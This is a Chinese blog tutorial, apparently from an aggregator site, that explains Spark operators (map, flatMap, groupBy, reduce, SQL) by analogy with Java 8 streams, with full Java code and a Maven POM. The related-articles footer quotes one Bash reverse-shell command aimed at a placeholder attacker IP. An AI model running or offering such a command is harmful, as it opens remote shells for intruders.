会 java 8 stream流就会大数据!

news2024/12/25 8:58:34

如果你会任意一门语言的stream流,没道理不会大数据开发。

俗话说男追女隔座山,女追男隔层纱。 如果说零基础学大数据,感觉前面是一座山,那么只要你会java或者任意一门语言的stream流,那大数据就只隔了一层纱。

本文以java stream流计算为例,讲解一些基础的spark操作。另一个流行的大数据框架flink同理。

准备工作

测试数据,以下列分别表示姓名,年龄,部门,职位。

张三,20,研发部,普通员工
李四,31,研发部,普通员工
李丽,36,财务部,普通员工
张伟,38,研发部,经理
杜航,25,人事部,普通员工
周歌,28,研发部,普通员工

创建一个Employee类。

@Getter
@Setter
@AllArgsConstructor
@NoArgsConstructor
@ToString
static
class Employee implements Serializable {
    private String name;
    private Integer age;
    private String department;
    private String level;
}

版本: jdk:1.8 spark:3.2.0 scala:2.12.15。

上面的 scala 版本只是spark框架本身需要依赖到 scala。

因为 scala 确实是比较小众的语言,本文还是使用 java 演示 spark 代码。

map类

java stream map

map 表示一对一操作。将上游数据的一行数据进行任意操作,最终得到操作后的一条数据。 这种思想,在 java 和 spark,flink 都是一致的。

我们先用 java stream 演示读取文件,再使用map操作将每行数据映射为Employee对象。

List<String> list = FileUtils.readLines(new File("f:/test.txt"), "utf-8");
List<Employee> employeeList = list.stream().map(word -> {
    List<String> words = Arrays.stream(word.split(",")).collect(Collectors.toList());
    Employee employee = new Employee(words.get(0), Integer.parseInt(words.get(1)), words.get(2), words.get(3));
    return employee;
}).collect(Collectors.toList());

employeeList.forEach(System.out::println);

转换后的数据:

JavaStreamDemo.Employee(name=张三, age=20, department=研发部, level=普通员工)
JavaStreamDemo.Employee(name=李四, age=31, department=研发部, level=普通员工)
JavaStreamDemo.Employee(name=李丽, age=36, department=财务部, level=普通员工)
JavaStreamDemo.Employee(name=张伟, age=38, department=研发部, level=经理)
JavaStreamDemo.Employee(name=杜航, age=25, department=人事部, level=普通员工)
JavaStreamDemo.Employee(name=周歌, age=28, department=研发部, level=普通员工)

spark map

首先得到一个 SparkSession 对象,读取文件,得到一个 DataSet 弹性数据集对象。

SparkSession session = SparkSession.builder().master("local[*]").getOrCreate();
Dataset<Row> reader = session.read().text("F:/test.txt");
reader.show();

这里的 show() 就是打印输出当前数据集,它是一个 action 类的算子。 得到结果:

+-----------------------+
|                  value|
+-----------------------+
|张三,20,研发部,普通员工|
|李四,31,研发部,普通员工|
|李丽,36,财务部,普通员工|
|    张伟,38,研发部,经理|
|杜航,25,人事部,普通员工|
|周歌,28,研发部,普通员工|
+-----------------------+

现在我们拿到了基础数据,我们使用map一对一操作,将一行行数据转换为Employee对象。 我们这里不使用lamda表达式,让大家看得更加清晰。

这里实现了MapFunction接口里的call方法,每次拿到一行数据,我们这里进行切分,再转换为对象。

  1. 需要特别指出的一点是,与后端WEB应用有一个统一异常处理不同的是,大数据应用,特别是流式计算,要保证7*24在线,需要对每个算子进行异常捕获。 因为你不知道上游数据清洗到底怎么样,很可能拿到一条脏数据,处理的时候抛出异常,如果没有捕获处理,那么整个应用就会挂掉。

  2. spark的算子分为Transformation和Action两种类型。Transformation会开成一个DAG图,具有lazy延迟性,它只会从一个dataset(rdd/df)转换成另一个dataset(rdd/df),只有当遇到action类的算子才会真正执行。 我们今天会演示的算子都是Transformation类的算子。

典型的Action算子包括show,collect,save之类的。比如在本地进行show查看结果,或者完成运行后save到数据库,或者HDFS。

  1. spark执行时分为driver和executor。但不是本文的重点,不会展开讲。 只需要注意driver端会将代码分发到各个分布式系统的节点executor上,它本身不会参与计算。一般来说,算子外部,如以下示例代码的a处会在driver端执行,b处算子内部会不同服务器上的executor端执行。 所以在算子外部定义的变量,在算子内部使用的时候要特别注意!! 不要想当然地以为都是一个main方法里写的代码,就一定会在同一个JVM里。

这里涉及到序列化的问题,同时它们分处不同的JVM,使用"=="比较的时候也可能会出问题!!

这是一个后端WEB开发转向大数据开发时,这个思想一定要转变过来。

简言之,后端WEB服务的分布式是我们自己实现的,大数据的分布式是框架天生帮我们实现的

MapFunction

// a 算子外部,driver端
Dataset<Employee> employeeDataset = reader.map(new MapFunction<Row, Employee>() {
            @Override
            public Employee call(Row row) throws Exception {
                // b 算子内部,executor端
                Employee employee = null;
                try {
                    // gson.fromJson(); 这里使用gson涉及到序列化问题
                    List<String> list = Arrays.stream(row.mkString().split(",")).collect(Collectors.toList());
                    employee = new Employee(list.get(0), Integer.parseInt(list.get(1)), list.get(2), list.get(3));
                } catch (Exception exception) {
                    // 日志记录
                    // 流式计算中要做到7*24小时不间断,任意一条上流脏数据都可能导致失败,从而导致任务退出,所以这里要做好异常的抓取
                    exception.printStackTrace();
                }
                return employee;
            }
        }, Encoders.bean(Employee.class));

        employeeDataset.show();

输出

+---+----------+--------+----+
|age|department|   level|name|
+---+----------+--------+----+
| 20|    研发部|普通员工|张三|
| 31|    研发部|普通员工|李四|
| 36|    财务部|普通员工|李丽|
| 38|    研发部|    经理|张伟|
| 25|    人事部|普通员工|杜航|
| 28|    研发部|普通员工|周歌|

MapPartitionsFunction

spark中 map和mapPartitions有啥区别?

map 是 1 条 1 条处理数据。 mapPartitions 是一个分区一个分区处理数据。

后者一定比前者效率高吗?

不一定,看具体情况。

这里使用前面 map 一样的逻辑处理。可以看到在 call 方法里得到的是一个 Iterator 迭代器,是一批数据。

得到一批数据,然后再一对一映射为对象,再以 Iterator 的形式返回这批数据。

Dataset<Employee> employeeDataset2 = reader.mapPartitions(new MapPartitionsFunction<Row, Employee>() {
    @Override
    public Iterator<Employee> call(Iterator<Row> iterator) throws Exception {
        List<Employee> employeeList = new ArrayList<>();
        while (iterator.hasNext()){
            Row row = iterator.next();
            try {
                List<String> list = Arrays.stream(row.mkString().split(",")).collect(Collectors.toList());
                Employee employee = new Employee(list.get(0), Integer.parseInt(list.get(1)), list.get(2), list.get(3));
                employeeList.add(employee);
            } catch (Exception exception) {
                // 日志记录
                // 流式计算中要做到7*24小时不间断,任意一条上流脏数据都可能导致失败,从而导致任务退出,所以这里要做好异常的抓取
                exception.printStackTrace();
            }
        }
        return employeeList.iterator();
    }
}, Encoders.bean(Employee.class));

employeeDataset2.show();

输出结果跟 map 一样,这里就不贴出来了。

flatMap类

map和flatMap有什么区别?

map是一对一,flatMap是一对多。 当然在java stream中,flatMap 叫法叫做扁平化。

这种思想,在java和spark,flink都是一致的。

java stream flatMap

以下代码将1条原始数据映射到2个对象上并返回。

List<Employee> employeeList2 = list.stream().flatMap(word -> {
List<String> words = Arrays.stream(word.split(",")).collect(Collectors.toList());
List<Employee> lists = new ArrayList<>();
Employee employee = new Employee(words.get(0), Integer.parseInt(words.get(1)), words.get(2), words.get(3));
lists.add(employee);
Employee employee2 = new Employee(words.get(0)+"_2", Integer.parseInt(words.get(1)), words.get(2), words.get(3));
lists.add(employee2);
return lists.stream();
}).collect(Collectors.toList());
employeeList2.forEach(System.out::println);

输出

JavaStreamDemo.Employee(name=张三, age=20, department=研发部, level=普通员工)
JavaStreamDemo.Employee(name=张三_2, age=20, department=研发部, level=普通员工)
JavaStreamDemo.Employee(name=李四, age=31, department=研发部, level=普通员工)
JavaStreamDemo.Employee(name=李四_2, age=31, department=研发部, level=普通员工)
JavaStreamDemo.Employee(name=李丽, age=36, department=财务部, level=普通员工)
JavaStreamDemo.Employee(name=李丽_2, age=36, department=财务部, level=普通员工)
JavaStreamDemo.Employee(name=张伟, age=38, department=研发部, level=经理)
JavaStreamDemo.Employee(name=张伟_2, age=38, department=研发部, level=经理)
JavaStreamDemo.Employee(name=杜航, age=25, department=人事部, level=普通员工)
JavaStreamDemo.Employee(name=杜航_2, age=25, department=人事部, level=普通员工)
JavaStreamDemo.Employee(name=周歌, age=28, department=研发部, level=普通员工)
JavaStreamDemo.Employee(name=周歌_2, age=28, department=研发部, level=普通员工)

spark flatMap

这里实现FlatMapFunction的call方法,一次拿到1条数据,然后返回值是Iterator,所以可以返回多条。

Dataset<Employee> employeeDatasetFlatmap = reader.flatMap(new FlatMapFunction<Row, Employee>() {
    @Override
    public Iterator<Employee> call(Row row) throws Exception {
        List<Employee> employeeList = new ArrayList<>();
        try {
            List<String> list = Arrays.stream(row.mkString().split(",")).collect(Collectors.toList());
            Employee employee = new Employee(list.get(0), Integer.parseInt(list.get(1)), list.get(2), list.get(3));
            employeeList.add(employee);

            Employee employee2 = new Employee(list.get(0)+"_2", Integer.parseInt(list.get(1)), list.get(2), list.get(3));
            employeeList.add(employee2);
        } catch (Exception exception) {
            exception.printStackTrace();
        }
        return employeeList.iterator();
    }
}, Encoders.bean(Employee.class));
employeeDatasetFlatmap.show();

输出

+---+----------+--------+------+
|age|department|   level|  name|
+---+----------+--------+------+
| 20|    研发部|普通员工|  张三|
| 20|    研发部|普通员工|张三_2|
| 31|    研发部|普通员工|  李四|
| 31|    研发部|普通员工|李四_2|
| 36|    财务部|普通员工|  李丽|
| 36|    财务部|普通员工|李丽_2|
| 38|    研发部|    经理|  张伟|
| 38|    研发部|    经理|张伟_2|
| 25|    人事部|普通员工|  杜航|
| 25|    人事部|普通员工|杜航_2|
| 28|    研发部|普通员工|  周歌|
| 28|    研发部|普通员工|周歌_2|
+---+----------+--------+------+

groupby类

与SQL类似,java stream流和spark一样,groupby对数据集进行分组并在此基础上可以进行聚合函数操作。也可以分组直接得到一组子数据集。

java stream groupBy

按部门分组统计部门人数:

Map<String, Long> map = employeeList.stream().collect(Collectors.groupingBy(Employee::getDepartment, Collectors.counting()));
        System.out.println(map);

输出

{财务部=1, 人事部=1, 研发部=4}

spark groupBy

将映射为对象的数据集按部门分组,在此基础上统计部门员工数和平均年龄。

RelationalGroupedDataset datasetGroupBy = employeeDataset.groupBy("department");
// 统计每个部门有多少员工
datasetGroupBy.count().show(); 
/**
 * 每个部门的平均年龄
 */
datasetGroupBy.avg("age").withColumnRenamed("avg(age)","avgAge").show();

输出分别为

+----------+-----+
|department|count|
+----------+-----+
|    财务部|    1|
|    人事部|    1|
|    研发部|    4|
+----------+-----+
+----------+------+
|department|avgAge|
+----------+------+
|    财务部|  36.0|
|    人事部|  25.0|
|    研发部| 29.25|
+----------+------+

spark groupByKey

spark 的groupBygroupByKey的区别,前者在此基础上使用聚合函数得到一个聚合值,后者只是进行分组,不进行任何计算。

类似于java stream的:

Map<String, List<Employee>> map2 = employeeList.stream().collect(Collectors.groupingBy(Employee::getDepartment));
System.out.println(map2);

输出

{财务部=[JavaStreamDemo.Employee(name=李丽, age=36, department=财务部, level=普通员工)], 
人事部=[JavaStreamDemo.Employee(name=杜航, age=25, department=人事部, level=普通员工)], 
研发部=[JavaStreamDemo.Employee(name=张三, age=20, department=研发部, level=普通员工), JavaStreamDemo.Employee(name=李四, age=31, department=研发部, level=普通员工), JavaStreamDemo.Employee(name=张伟, age=38, department=研发部, level=经理), JavaStreamDemo.Employee(name=周歌, age=28, department=研发部, level=普通员工)]}

使用spark groupByKey。

先得到一个key-value的一对多的一个集合数据集。 这里的call()方法返回的是key,即分组的key。

KeyValueGroupedDataset keyValueGroupedDataset = employeeDataset.groupByKey(new MapFunction<Employee, String>() {
    @Override
    public String call(Employee employee) throws Exception {
        // 返回分组的key,这里表示根据部门进行分组
        return employee.getDepartment();
    }
}, Encoders.STRING());

再在keyValueGroupedDataset 的基础上进行mapGroups,在call()方法里就可以拿到每个key的所有原始数据。

keyValueGroupedDataset.mapGroups(new MapGroupsFunction() {
            @Override
            public Object call(Object key, Iterator iterator) throws Exception {
                System.out.println("key = " + key);
                while (iterator.hasNext()){
                    System.out.println(iterator.next());
                }
                return iterator; 
            }
        }, Encoders.bean(Iterator.class))
                .show(); // 这里的show()没有意义,只是触发计算而已

输出

key = 人事部
SparkDemo.Employee(name=杜航, age=25, department=人事部, level=普通员工)
key = 研发部
SparkDemo.Employee(name=张三, age=20, department=研发部, level=普通员工)
SparkDemo.Employee(name=李四, age=31, department=研发部, level=普通员工)
SparkDemo.Employee(name=张伟, age=38, department=研发部, level=经理)
SparkDemo.Employee(name=周歌, age=28, department=研发部, level=普通员工)
key = 财务部
SparkDemo.Employee(name=李丽, age=36, department=财务部, level=普通员工)

reduce类

reduce的字面意思是:减少;减小;降低;缩小。 又叫归约。

它将数据集进行循环,让当前对象前一对象两两进行计算,每次计算得到的结果作为下一次计算的前一对象,并最终得到一个对象。

假设有5个数据【1,2,3,4,5】,使用reduce进行求和计算,分别是

比如上面的测试数据集,我要计算各部门年龄总数。使用聚合函数得到的是一个int类型的数字。

java stream reduce

int age = employeeList.stream().mapToInt(e -> e.age).sum();
System.out.println(age);//178

使用 reduce 也可进行上面的计算

int age1 = employeeList.stream().mapToInt(e -> e.getAge()).reduce(0,(a,b) -> a+b);
System.out.println(age1);// 178

但是我将年龄求和,同时得到一个完整的对象呢?

JavaStreamDemo.Employee(name=周歌, age=178, department=研发部, level=普通员工)

可以使用 reduce 将数据集两两循环,将年龄相加,同时返回最后一个遍历的对象。

下面代码的 pre 代表前一个对象,current 代表当前对象。

 /**
 * pre 代表前一个对象
 * current 代表当前对象
 */
Employee reduceEmployee = employeeList.stream().reduce(new Employee(), (pre,current) -> {
     // 当第一次循环时前一个对象为null
    if (pre.getAge() == null) {
        current.setAge(current.getAge());
    } else {
        current.setAge(pre.getAge() + current.getAge());
    }
    return current;
});
System.out.println(reduceEmployee);

spark reduce

spark reduce的基本思想跟java stream是一样的。

直接看代码:

Employee datasetReduce = employeeDataset.reduce(new ReduceFunction<Employee>() {
    @Override
    public Employee call(Employee t1, Employee t2) throws Exception {
        // 不同的版本看是否需要判断t1 == null
        t2.setAge(t1.getAge() + t2.getAge());
        return t2;
    }
});

System.out.println(datasetReduce);

输出

SparkDemo.Employee(name=周歌, age=178, department=研发部, level=普通员工)

其它常见操作类

Employee employee = employeeDataset.filter("age > 30").limit(3).sort("age").first();
System.out.println(employee);
// SparkDemo.Employee(name=李四, age=31, department=研发部, level=普通员工)

同时可以将dataset注册成table,使用更为强大的SQL来进行各种强大的运算。 现在SQL是flink的一等公民,spark也不遑多让。 这里举一个非常简单的例子。

employeeDataset.registerTempTable("table");
session.sql("select * from table where age > 30 order by age desc limit 3").show();

输出

+---+----------+--------+----+
|age|department|   level|name|
+---+----------+--------+----+
| 38|    研发部|    经理|张伟|
| 36|    财务部|普通员工|李丽|
| 31|    研发部|普通员工|李四|
+---+----------+--------+----+
employeeDataset.registerTempTable("table");
session.sql("select 
    concat_ws(',',collect_set(name)) as names, // group_concat
    avg(age) as age,
    department from table 
    where age > 30  
    group by department 
    order by age desc 
    limit 3").show();

输出

+---------+----+----------+
|    names| age|department|
+---------+----+----------+
|     李丽|36.0|    财务部|
|张伟,李四|34.5|    研发部|
+---------+----+----------+

小结

本文依据java stream的相似性,介绍了spark里面一些常见的算子操作。

本文只是做一个非常简单的入门介绍。

如果感兴趣的话, 后端的同学可以尝试着操作一下,非常简单,本地不需要搭建环境,只要引入spark 的 maven依赖即可。

我把本文的所有代码全部贴在最后面。

java stream 源码:

点击查看代码

import lombok.*;
import org.apache.commons.io.FileUtils;

import java.io.File;
import java.io.IOException;
import java.io.Serializable;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import java.util.Map;
import java.util.stream.Collectors;

public class JavaStreamDemo {
    public static void main(String[] args) throws IOException {
        /**
         * 张三,20,研发部,普通员工
         * 李四,31,研发部,普通员工
         * 李丽,36,财务部,普通员工
         * 张伟,38,研发部,经理
         * 杜航,25,人事部,普通员工
         * 周歌,28,研发部,普通员工
         */
        List<String> list = FileUtils.readLines(new File("f:/test.txt"), "utf-8");
        List<Employee> employeeList = list.stream().map(word -> {
            List<String> words = Arrays.stream(word.split(",")).collect(Collectors.toList());
            Employee employee = new Employee(words.get(0), Integer.parseInt(words.get(1)), words.get(2), words.get(3));
            return employee;
        }).collect(Collectors.toList());

        // employeeList.forEach(System.out::println);

        List<Employee> employeeList2 = list.stream().flatMap(word -> {
            List<String> words = Arrays.stream(word.split(",")).collect(Collectors.toList());
            List<Employee> lists = new ArrayList<>();
            Employee employee = new Employee(words.get(0), Integer.parseInt(words.get(1)), words.get(2), words.get(3));
            lists.add(employee);
            Employee employee2 = new Employee(words.get(0)+"_2", Integer.parseInt(words.get(1)), words.get(2), words.get(3));
            lists.add(employee2);
            return lists.stream();
        }).collect(Collectors.toList());
        // employeeList2.forEach(System.out::println);

        Map<String, Long> map = employeeList.stream().collect(Collectors.groupingBy(Employee::getDepartment, Collectors.counting()));
        System.out.println(map);
        Map<String, List<Employee>> map2 = employeeList.stream().collect(Collectors.groupingBy(Employee::getDepartment));
        System.out.println(map2);

        int age = employeeList.stream().mapToInt(e -> e.age).sum();
        System.out.println(age);// 178

        int age1 = employeeList.stream().mapToInt(e -> e.getAge()).reduce(0,(a,b) -> a+b);
        System.out.println(age1);// 178

        /**
         * pre 代表前一个对象
         * current 代表当前对象
         */
        Employee reduceEmployee = employeeList.stream().reduce(new Employee(), (pre,current) -> {
            if (pre.getAge() == null) {
                current.setAge(current.getAge());
            } else {
                current.setAge(pre.getAge() + current.getAge());
            }
            return current;
        });
        System.out.println(reduceEmployee);

    }

    @Getter
    @Setter
    @AllArgsConstructor
    @NoArgsConstructor
    @ToString
    static
    class Employee implements Serializable {
        private String name;
        private Integer age;
        private String department;
        private String level;
    }
}

spark 的源码:

 

点击查看代码

import com.google.gson.Gson;
import lombok.*;
import org.apache.spark.api.java.function.*;
import org.apache.spark.sql.*;

import java.io.Serializable;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Iterator;
import java.util.List;
import java.util.stream.Collectors;

public class SparkDemo {
    public static void main(String[] args) {
        SparkSession session = SparkSession.builder().master("local[*]").getOrCreate();
        Dataset<Row> reader = session.read().text("F:/test.txt");
        // reader.show();
        /**
         * +-----------------------+
         * |                  value|
         * +-----------------------+
         * |张三,20,研发部,普通员工|
         * |李四,31,研发部,普通员工|
         * |李丽,36,财务部,普通员工|
         * |张伟,38,研发部,经理|
         * |杜航,25,人事部,普通员工|
         * |周歌,28,研发部,普通员工|
         * +-----------------------+
         */

        // 本地演示而已,实际分布式环境,这里的gson涉及到序列化问题
        // 算子以外的代码都在driver端运行
        // 任何算子以内的代码都在executor端运行,即会在不同的服务器节点上执行
        Gson gson = new Gson();
        // a 算子外部,driver端
        Dataset<Employee> employeeDataset = reader.map(new MapFunction<Row, Employee>() {
            @Override
            public Employee call(Row row) throws Exception {
                // b 算子内部,executor端
                Employee employee = null;
                try {
                    // gson.fromJson(); 这里使用gson涉及到序列化问题
                    List<String> list = Arrays.stream(row.mkString().split(",")).collect(Collectors.toList());
                    employee = new Employee(list.get(0), Integer.parseInt(list.get(1)), list.get(2), list.get(3));
                } catch (Exception exception) {
                    // 日志记录
                    // 流式计算中要做到7*24小时不间断,任意一条上流脏数据都可能导致失败,从而导致任务退出,所以这里要做好异常的抓取
                    exception.printStackTrace();
                }
                return employee;
            }
        }, Encoders.bean(Employee.class));

        // employeeDataset.show();
        /**
         * +---+----------+--------+----+
         * |age|department|   level|name|
         * +---+----------+--------+----+
         * | 20|    研发部|普通员工|张三|
         * | 31|    研发部|普通员工|李四|
         * | 36|    财务部|普通员工|李丽|
         * | 38|    研发部|    经理|张伟|
         * | 25|    人事部|普通员工|杜航|
         * | 28|    研发部|普通员工|周歌|
         */

        Dataset<Employee> employeeDataset2 = reader.mapPartitions(new MapPartitionsFunction<Row, Employee>() {
            @Override
            public Iterator<Employee> call(Iterator<Row> iterator) throws Exception {
                List<Employee> employeeList = new ArrayList<>();
                while (iterator.hasNext()){
                    Row row = iterator.next();
                    try {
                        List<String> list = Arrays.stream(row.mkString().split(",")).collect(Collectors.toList());
                        Employee employee = new Employee(list.get(0), Integer.parseInt(list.get(1)), list.get(2), list.get(3));
                        employeeList.add(employee);
                    } catch (Exception exception) {
                        // 日志记录
                        // 流式计算中要做到7*24小时不间断,任意一条上流脏数据都可能导致失败,从而导致任务退出,所以这里要做好异常的抓取
                        exception.printStackTrace();
                    }
                }
                return employeeList.iterator();
            }
        }, Encoders.bean(Employee.class));

        // employeeDataset2.show();
        /**
         * +---+----------+--------+----+
         * |age|department|   level|name|
         * +---+----------+--------+----+
         * | 20|    研发部|普通员工|张三|
         * | 31|    研发部|普通员工|李四|
         * | 36|    财务部|普通员工|李丽|
         * | 38|    研发部|    经理|张伟|
         * | 25|    人事部|普通员工|杜航|
         * | 28|    研发部|普通员工|周歌|
         * +---+----------+--------+----+
         */

        Dataset<Employee> employeeDatasetFlatmap = reader.flatMap(new FlatMapFunction<Row, Employee>() {
            @Override
            public Iterator<Employee> call(Row row) throws Exception {
                List<Employee> employeeList = new ArrayList<>();
                try {
                    List<String> list = Arrays.stream(row.mkString().split(",")).collect(Collectors.toList());
                    Employee employee = new Employee(list.get(0), Integer.parseInt(list.get(1)), list.get(2), list.get(3));
                    employeeList.add(employee);

                    Employee employee2 = new Employee(list.get(0)+"_2", Integer.parseInt(list.get(1)), list.get(2), list.get(3));
                    employeeList.add(employee2);
                } catch (Exception exception) {
                    exception.printStackTrace();
                }
                return employeeList.iterator();
            }
        }, Encoders.bean(Employee.class));
//        employeeDatasetFlatmap.show();
        /**
         * +---+----------+--------+------+
         * |age|department|   level|  name|
         * +---+----------+--------+------+
         * | 20|    研发部|普通员工|  张三|
         * | 20|    研发部|普通员工|张三_2|
         * | 31|    研发部|普通员工|  李四|
         * | 31|    研发部|普通员工|李四_2|
         * | 36|    财务部|普通员工|  李丽|
         * | 36|    财务部|普通员工|李丽_2|
         * | 38|    研发部|    经理|  张伟|
         * | 38|    研发部|    经理|张伟_2|
         * | 25|    人事部|普通员工|  杜航|
         * | 25|    人事部|普通员工|杜航_2|
         * | 28|    研发部|普通员工|  周歌|
         * | 28|    研发部|普通员工|周歌_2|
         * +---+----------+--------+------+
         */

        RelationalGroupedDataset datasetGroupBy = employeeDataset.groupBy("department");
        // 统计每个部门有多少员工
        // datasetGroupBy.count().show();
        /**
         * +----------+-----+
         * |department|count|
         * +----------+-----+
         * |    财务部|    1|
         * |    人事部|    1|
         * |    研发部|    4|
         * +----------+-----+
         */
        /**
         * 每个部门的平均年龄
         */
        // datasetGroupBy.avg("age").withColumnRenamed("avg(age)","avgAge").show();
        /**
         * +----------+--------+
         * |department|avg(age)|
         * +----------+--------+
         * |    财务部|    36.0|
         * |    人事部|    25.0|
         * |    研发部|   29.25|
         * +----------+--------+
         */

        KeyValueGroupedDataset keyValueGroupedDataset = employeeDataset.groupByKey(new MapFunction<Employee, String>() {
            @Override
            public String call(Employee employee) throws Exception {
                // 返回分组的key,这里表示根据部门进行分组
                return employee.getDepartment();
            }
        }, Encoders.STRING());

        keyValueGroupedDataset.mapGroups(new MapGroupsFunction() {
            @Override
            public Object call(Object key, Iterator iterator) throws Exception {
                System.out.println("key = " + key);
                while (iterator.hasNext()){
                    System.out.println(iterator.next());
                }
                return iterator;
                /**
                 * key = 人事部
                 * SparkDemo.Employee(name=杜航, age=25, department=人事部, level=普通员工)
                 * key = 研发部
                 * SparkDemo.Employee(name=张三, age=20, department=研发部, level=普通员工)
                 * SparkDemo.Employee(name=李四, age=31, department=研发部, level=普通员工)
                 * SparkDemo.Employee(name=张伟, age=38, department=研发部, level=经理)
                 * SparkDemo.Employee(name=周歌, age=28, department=研发部, level=普通员工)
                 * key = 财务部
                 * SparkDemo.Employee(name=李丽, age=36, department=财务部, level=普通员工)
                 */
            }
        }, Encoders.bean(Iterator.class))
                .show(); // 这里的show()没有意义,只是触发计算而已


        Employee datasetReduce = employeeDataset.reduce(new ReduceFunction<Employee>() {
            @Override
            public Employee call(Employee t1, Employee t2) throws Exception {
                // 不同的版本看是否需要判断t1 == null
                t2.setAge(t1.getAge() + t2.getAge());
                return t2;
            }
        });

        System.out.println(datasetReduce);


        Employee employee = employeeDataset.filter("age > 30").limit(3).sort("age").first();
        System.out.println(employee);
        // SparkDemo.Employee(name=李四, age=31, department=研发部, level=普通员工)

        employeeDataset.registerTempTable("table");
        session.sql("select * from table where age > 30 order by age desc limit 3").show();

        /**
         * +---+----------+--------+----+
         * |age|department|   level|name|
         * +---+----------+--------+----+
         * | 38|    研发部|    经理|张伟|
         * | 36|    财务部|普通员工|李丽|
         * | 31|    研发部|普通员工|李四|
         * +---+----------+--------+----+
         */


    }

    @Getter
    @Setter
    @AllArgsConstructor
    @NoArgsConstructor
    @ToString
    public static class Employee implements Serializable {
        private String name;
        private Integer age;
        private String department;
        private String level;
    }
}

spark maven依赖,自行不需要的spark-streaming,kafka依赖去掉。

点击查看代码

<properties>
        <maven.compiler.source>8</maven.compiler.source>
        <maven.compiler.target>8</maven.compiler.target>
        <maven.compiler.source>1.8</maven.compiler.source>
        <maven.compiler.target>1.8</maven.compiler.target>
        <scala.version>2.12.15</scala.version>
        <spark.version>3.2.0</spark.version>
        <encoding>UTF-8</encoding>
    </properties>
    <dependencies>
        <!-- scala依赖-->
        <dependency>
            <groupId>org.scala-lang</groupId>
            <artifactId>scala-library</artifactId>
            <version>${scala.version}</version>
        </dependency>
        <!-- spark依赖-->
        <dependency>
            <groupId>org.apache.spark</groupId>
            <artifactId>spark-sql_2.12</artifactId>
            <version>${spark.version}</version>
        </dependency>

        <dependency>
            <groupId>org.projectlombok</groupId>
            <artifactId>lombok</artifactId>
            <version>1.18.2</version>
            <scope>provided</scope>
        </dependency>

        <!--<dependency>
            <groupId>org.apache.spark</groupId>
            <artifactId>spark-streaming-kafka-0-10_2.12</artifactId>
            <version>${spark.version}</version>
        </dependency>-->

        <dependency>
            <groupId>org.apache.spark</groupId>
            <artifactId>spark-sql-kafka-0-10_2.12</artifactId>
            <version>${spark.version}</version>
        </dependency>

        <dependency>
            <groupId>com.google.code.gson</groupId>
            <artifactId>gson</artifactId>
            <version>2.7</version>
        </dependency>

        <dependency>
            <groupId>mysql</groupId>
            <artifactId>mysql-connector-java</artifactId>
            <version>5.1.34</version>
        </dependency>

    </dependencies>

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/684004.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

内网隧道代理技术(七)之Bash反弹shell

Bash反弹shell Bash介绍 Shell也称为终端或壳&#xff0c;是人与内核之间的翻译官&#xff0c;而Bash则是Linux中默认使用的Shell Bash 反弹Shell的命令如下&#xff1a; bash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&1 bash -i >&/dev/tcp/攻击机_IP…

【博客676】VictoriaMetrics缓存限制之:布隆过滤器

VictoriaMetrics缓存限制之&#xff1a;布隆过滤器 1、场景 VictoriaMetrics的vmstorage组件接收上游传递过来的指标&#xff0c;在​​现实场景中&#xff0c;指标的数量级或者瞬态指标可能会非常可怕&#xff0c;如果不限制缓存的大小&#xff0c;就会存在由于缓存导致插入速…

模拟电路系列分享-运放的关键参数4

目录 概要 整体架构流程 技术名词解释 1.定义 2.优劣范围 3.理解 技术细节 1.压摆率 1.定义∶ 2.优劣范围 3.理解︰ 2.单位增益带宽 1.定义∶ 2.优劣范围︰ 3.理解∶ 小结 概要 提示&#xff1a;这里可以添加技术概要 例如&#xff1a; 实际运放与理想运放具有很多差别。理想…

jumpserver【基本使用教程】

目录 目录 【1】管理用户 【2】系统用户 【3】普通用户 【4】添加资产&#xff08;可以添加的有&#xff1a;服务器、网络设备、数据库应用&#xff09; 【5】权限划分 【6】验证&#xff08;使用普通用户登录资产&#xff09; 【7】查看是否有记录 【8】添加数据库资产…

2023全球智博会奏响AI产业发展的四重共振

2023年6月25日为期三天的第五届全球人工智能产品应用博览会&#xff08;简称“全球智博会”&#xff09;在苏州国际博览中心盛大启幕。金鸡湖畔汇聚院士专家、领军智囊、顶尖企业&#xff0c;为人工智能关键技术突破、产业化创新应用、科技产品研发落地、经济深度融合等方面提供…

解密EEMD分析:Rlibeemd包带你玩转信号分解和时间序列预测

一、简介 1.1 什么是EEMD? EEMD&#xff08;Ensemble Empirical Mode Decomposition&#xff09;是一种信号分解方法&#xff0c;它旨在分解非线性、非平稳或非白噪声的信号&#xff0c;以揭示复杂信号的局部特征和周期性成分。EEMD不同于传统的余弦变换、小波变换等线性变换…

按键控制蜂鸣器实验

目录 按键控制蜂鸣器实验 1、简介 2、实验任务 3、程序设计 3.1、顶层模块代码 3.2、按键消抖模块代码 3.3、蜂鸣器控制模块代码 4、仿真验证 5、板上下载验证 5.1、硬件设计 5.2、添加约束文件.xdc 5.3、板上下载验证 按键控制蜂鸣器实验 蜂鸣器&#xff08;Buzze…

微机保护主程序框图原理

微机保护主程序框图如图2&#xff0d;5所示。 一、初始化 “初始化”是指保护装置在上电或按下复位键时首先执行的程序&#xff0c;它主要是对单片微机&#xff08;CPU&#xff09;及可编程扩展芯片的工作方式、参数的设置&#xff0c;以便在后面的程序中按预定方案工作。例如…

荨麻疹【指南共识】

慢性自发性荨麻疹达标治疗专家共识&#xff08;2023&#xff09; 参考文献&#xff1a;中华医学会皮肤性病学分会&#xff0c; 中国医师协会皮肤科医师分会. 慢性自发性荨麻疹达标治疗专家共识&#xff08;2023&#xff09;[J]&#xff0e; 中华皮肤科杂志&#xff0c;2023, e2…

在React+ts中集成高德地图(保姆级教程)

前往高德地图开发平台高德开放平台 | 高德地图API 一&#xff1a;申请高德key 去高德官网去创建一个属于自己的地图应用 &#xff08;得到key和秘钥&#xff09; 。 首先&#xff0c;我们要注册一个开发者账号&#xff0c;根据实际情况填写&#xff0c;身份写个人&#xff1a;…

LwIP系列(3):以太网帧、IP、TCP、UDP、IGMP、ICMP帧格式详解

